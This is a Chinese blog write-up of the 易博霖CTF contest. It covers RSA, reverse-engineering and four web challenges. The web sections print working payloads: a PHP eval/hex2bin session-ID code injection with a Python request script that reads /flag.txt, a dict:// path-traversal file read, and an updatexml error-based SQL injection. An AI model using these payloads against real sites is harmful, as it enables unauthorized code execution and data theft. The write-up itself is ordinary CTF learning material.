ctf 改变图片高度_易博霖CTF+MRCTF

最新推荐文章于 2024-03-27 19:33:38 发布
最新推荐文章于 2024-03-27 19:33:38 发布
阅读量2.9k 收藏
点赞数 1
文章标签: ctf 改变图片高度
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32300981/article/details/112368359
版权

易博霖CTF

签到题

14829d30c5067ab605a82b109438cde1.gif a5507230eef47c22880381d1be12e068.png f559cec065fe8cbe434817f574e4d1f3.png

RSABackDoor

14829d30c5067ab605a82b109438cde1.gif

先用脚本跑出p

451166460169bb928ac6a80825f64bb3.png baf92e8a357ed9186cc88aa259a187fd.png

分解后直接求

c0a7e7af69c7f2ed1c13634c096ec000.png a197f698aa5427a8212c0bb89e3a9e57.png f559cec065fe8cbe434817f574e4d1f3.png

Re1

14829d30c5067ab605a82b109438cde1.gif 1785cfc3b4198e35dd8b3f05336b3478.png

转一下就是flag

1b3daf7ee4fc139d67021c4f7aa83149.png f559cec065fe8cbe434817f574e4d1f3.png

RE_Babyangr

14829d30c5067ab605a82b109438cde1.gif

分析主函数,大致意思为输入16个字符,然后经过complex_function函数的处理与password比较

81198e2101ab791e12cb756ee6f6fb15.png

complex_function函数如下

8c69e014614ae793ce790fc46f0e2dda.png

告诉我们字符范围为65到90,直接爆破求出flag

8d5479d2e23954aed77e8b2ec49c7f86.png dc320a96c15254b2705383354627ce93.png f559cec065fe8cbe434817f574e4d1f3.png

Web1

14829d30c5067ab605a82b109438cde1.gif

限制传入的参数只能为 function(function(function()))

这种类型

session_id 用来获取当前会话id,但是会话id的组成仅允许字母数字,这样可以想到用十六进制来进行操作。

所以构造

payload:eval(hex2bin(session_id(session_start())));

脚本:

import requests

url= "http://124.193.74.212:32625/?var=eval(hex2bin(session_id(session_start())));"

payload="var_dump(file_get_contents('/flag.txt'));".encode('hex')

cookies={'PHPSESSID':payload}

f559cec065fe8cbe434817f574e4d1f3.png

Web2

14829d30c5067ab605a82b109438cde1.gif a072165b62290c3d90ab505ae727b77d.png

File 参数后门跟着一串base64编码两次的字符串 对其解码为

ctfimage.jpg

判断存在文件包含漏洞 构造index.php 编码两次传入得到源码

3b0c24f686a11fcdd5ce1f7fc5982b9b.png

提示读取hal0flagi5here.php

03ebdfca40cfa14fcbb489942753f3a1.png

虽然index.php里做了将ctf转成flag的处理,但并没有限制flag字符串,不知道这个判断有什么意义。

根据提示知道是 parse_url的漏洞

直接构造

dict://@happyctf.com/../../../../flag.txt

4fa1315384e35a6444e9b8dced24aff9.png f559cec065fe8cbe434817f574e4d1f3.png

Web3

14829d30c5067ab605a82b109438cde1.gif

有注册登录改密码三个功能

在改密码的时候会进行查询操作

只要在第一步注册用户名时插入” 在改密码时点击提交就会产生报错

注册用户名

yy"||(updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#

11cba1b8b793d1497954a1fb814648fa.png

查出了当前数据库的表名

6d36328acc4b5b98ca0a38146b2c6721.png

用脚本跑出flag

7bbfefd493a99feff47a53a76e6d5d5d.png f559cec065fe8cbe434817f574e4d1f3.png

Web4

14829d30c5067ab605a82b109438cde1.gif d9243b98e10a839899da8b9d08ed3f6e.png 49ef54fc78354584a9d7f4252b3c4b0b.png <
最低0.47元/天 解锁文章
三岛娱纪夫
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一行代码制作自己的QQ/微信二维码,还可以制作动态的哟~(小白再也不用去求别人了)
CSDN_C2的博客
08-28 1309
今天,我们要用Python制作一个炫酷的二维码,还可以是动得哟 废话少说,我们开始制作吧~ 安装MyQR 1.点击win+r,进入运行页面: 2.输入cmd,点击确定: 3.打开页面,输入’pip install myqr -i https://pypi.tuna.tsinghua.edu.cn/simple‘即可实现高速下载 高速下载具体可看:python pip怎么实现高速下载 生成二维码 首先我们要准备张图片,这里我拿了张海绵宝宝的图片放在了桌面上: imy.jpg 然后: 1.依照上述方
获取图片宽度和高度的类,支持JPG,GIF,PNG,BMP
01-20
<% Class ImgWHInfo ”获取图片宽度和高度的类,支持JPG,GIF,PNG,BMP Dim ASO Private Sub Class_Initialize Set ASO=Server.CreateObject(“ADODB.Stream”) ASO.Mode=3 ASO.Type=1 ASO.Open End Sub Private Sub Class_Terminate Err.Clear Set ASO=Nothing End Sub Private Function Bin2Str(Bin) Dim I, Str For I=1 To LenB(Bin) clow=M
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
CTF练题(2) png图片修改宽高典型例题
beyondlight6的博客
10-24 6719
print('\n\n',i,j,crc32) #0x 后的数字为十六进制中crc位置的代码(winhex左016,13-下一行的0)(1)根据题目提示(要是图片长一点该多好......),暗示图片宽高参数被修改,将图片拖进kali虚拟机中进行验证,发现图片为损坏状态,确定为宽高被修改类型。(2)此处我们可以使用python3进行crc32爆破,通过枚举的方式获得正确的图片宽高。黑色矩形框住的为该图片的crc码,蓝色的为宽高数据。此为修改后的原图隐藏部分,获得flag。
ctf图像隐写一:010editor
qq_45215609的博客
03-27 2441
ctf图像隐写一:010editor。png修改宽高,jpg文件格式末尾插入,针对ctf图像隐写的一般首先这样进行。
CTF-隐写(改图片高度
Zhang_hongchao的博客
01-22 1万+
题目:显示以下图片 解析: 1、将图片用010editor打开,发现010editor没有按照png文件的解析器; 2、从官方网站上(http://sweetscape.com/010editor)的文件解析脚本下载页面中下载PNGTemplate.bt; 3、用010 Editor打开PNG文件; 4、通过Templates -> Open Template菜单打开PNGTemplate.bt,按F5键运行该脚本,就可以在Template Results窗口中看到该PNG文件的解.
ctf 图片宽高修改
CH0ico's Blog
03-10 2980
jpg png格式文件怎么修改宽高呢?(非裁剪)
【爬虫】谷歌、必应、百度图片爬取用于深度学习
zhicai_liu的博客
11-17 506
推荐一个很好用的开源项目,用于爬取工程项目中用的图片数据:https://github.com/sczhengyabin/Image-Downloader 该项目存在一个问题,有时为了更多的获取工程项目所需的图片数据,需要更换不同的关键词来爬取,但是这样爬下来的数据存在很多重复图片,因此,需要采取一个去重的策略。 在此,提供一个去重的方法,就是记录已经爬过的图片的URL,已经爬过的URL直接跳过。 修改downloader.py中的download_images函数,记录爬过的URL: def downlo
CTF--图片隐写之修改图片宽和高
qq_45927819的博客
04-05 2万+
这也是做图片杂项时前几步需要考虑的,有时没有任何线索就去修改宽高 比如我们拿到这样一个图片一看这个图片就明显缺失了一部分,直接去修改图片的宽和高,查看一下图片的宽高:1119*512。将1119转换成16进制为45f,512转换成16进制就是200,把图片拉进winhex里边:找到宽和高代表的16进制码,其实第二行开始的00 00 04 5F 代表的就是宽,00 00 02 00代表的是高,这张图...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
轩禹CTF_RSA工具3.6.1.zip
01-29
CTF常用工具集
PNG图片宽高一把梭 ctf-misc 杂项 直接还原图片原本高度 CRC计算 暴力破解
02-07
ctf-misc 杂项 直接还原图片原本高度 CRC计算 暴力破解 直接还原图片原本高度 直接还原图片原本高度 直接还原图片原本高度 直接还原图片原本高度 直接还原图片原本高度 直接还原图片原本高度 直接还原图片原本高度 ...
CTF-MISC图片求正确宽高破解和修改总结
LCW991207的博客
02-03 1457
150=13500,去掉文件头后是675000/3=225000,明显多了很多,于是用225000除以900=250,所以正确的为900。
CTF 图片隐写之修改图片高宽
热门推荐
D-R0s1的博客
07-19 3万+
                                             CTF WriteUp                                                                        ——图片隐写之修改图片宽高        我们平时在做ctf中的misc部分时,常常会遇到图片隐写中的修改图片宽高使图片照片中隐藏的flag...
ctf图片隐写之修改图片高度
Cosmopolitan的博客
12-22 1万+
这里的例子是安恒2018年12月赛MISC题目 这里我们用Hex workshop修改png的高度 先看一下png的文件结构 class Chunk { public: DWORD ChunkLen;//ChunkLen 不算 ChunkLen,Tag,CRC的长度 DWORD Tag;//4byte DWORD CRC;效验码 };//12个字节+4个字节字符串“IHDR” = 0x10=16...
20220209-CTF-MISC-BUUCTF-修改图片宽高--ARCHPR工具的使用
qq_51550750的博客
02-09 5520
CTF-MISC-BUUCTF-大白 下载附件: 解压,得到一张图片: 打开不能: 已经损坏。 然后用stegsolve尝试打开: 明显是图片高度修改了,导致图片只显示了一半 菜单栏选择Analyze–》File Format—〉查看图片数据 为了修改图片高度,结合上面得到的,用010editor打开dabai.png,然后找到值,将高度修改为两倍100—》1000: 查看图片,最后得到flag:flag{He1l0_d4_ba1} 这道题不建议大家放到Mac或者kali的环境下去
[CTF]修改图片的长宽(大白)
hclimg的博客
11-28 1万+
题目:修改图片高度 查看题目,看到提示屏幕太小,可知图片已经的大小被修改了,查看图片属性,长宽分别为679和256, 拖进010 editor查看,00 00 02 A7表示图片的宽度,00 00 01 00表示图片高度,也可以把鼠标放到编码上面,也会有小字显示代表的意思,找到宽度和高度的地方 把00 00 01 00 修改为 00 00 02 A7点击左上角的另存为图片即可。 提交flag,成功! ...
Hardware Engineering
最新发布
07-06
Hardware Engineering Resources This document provides a curated list of resources for learning about hardware engineering, including books, online courses, websites, professional organizations, and online communities. Whether you're a beginner or looking to deepen your knowledge, these resources cover a wide range of topics in hardware engineering.
ctf Web_php_include
08-28
CTF(Capture The Flag)是一种网络安全竞赛,其中参与者需要解决各种与网络安全相关的问题。"Web_php_include" 是一个问题的提示,暗示了一个与 PHP 文件包含漏洞相关的 CTF 题目。 PHP 文件包含漏洞是一种常见的 Web 安全漏洞,它允许攻击者通过构造恶意请求来包含并执行服务器上的任意文件。攻击者可以利用这个漏洞来读取敏感文件、执行任意代码以及获取服务器权限。 在 CTF 中,解决 "Web_php_include" 题目的步骤通常如下: 1. 探测漏洞点:通过发送不同的请求,观察是否存在 PHP 文件包含漏洞。 2. 利用漏洞点:构造特定的请求,使得服务器执行恶意代码或读取敏感文件。 3. 获取目标:根据题目要求,尝试获取相应的 flag 或其他标识符。 4. 提交答案:将 flag 或其他标识符提交给比赛组织者验证。 请注意,在实际应用开发中,要避免 PHP 文件包含漏洞,可以使用安全的文件包含函数(如 require_once 或 include_once)、限制包含路径、以及对用户输入进行严格过滤和验证等安全措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值